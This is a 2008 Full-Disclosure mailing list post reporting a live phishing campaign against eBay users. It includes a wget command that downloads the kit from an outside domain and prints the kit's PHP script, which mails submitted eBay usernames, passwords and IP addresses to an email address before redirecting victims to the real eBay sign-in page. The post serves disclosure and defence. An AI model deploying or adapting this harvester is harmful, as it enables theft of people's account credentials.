[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <7E85B3DA-8312-4DE9-AA93-E62157E76EE8@digitalmunition.com>
Date: Mon, 22 Dec 2008 13:32:50 -0500
From: "Kevin Finisterre (lists)" <kf_lists@...italmunition.com>
To: Full Disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Fresh Phish anyone?
>
Someone is bored and out making the rounds exploiting random asp pages
and web-services.
wget http://www.adehkz.net/eb.zip
<?php
session_start();
$userid = $_POST['userid'];
$password = $_POST['password'];
$ip = getenv("REMOTE_ADDR");
$subj = "eB - $userid";
$msg = "Username: $userid\nPassword: $password\n....\nIP: $ip";
mail("asdfwr@...il.com", $subj, $msg);
header("Location: https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&errmsg=8&pUserId=&co_partnerId=2&siteid=0&pageType=1883&pa1=&i1=-1&UsingSSL=1&bshowgif=0&favoritenav=&ru=http%3A%2F%2Fmy.ebay.com%2Fws%2FeBayISAPI.dll%3FMyeBay&pp=&migrateVisitor=1
");
?>
I passed this on to the SANS handlers a few days ago but the site is
still up and running.
Enjoy
-KF
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists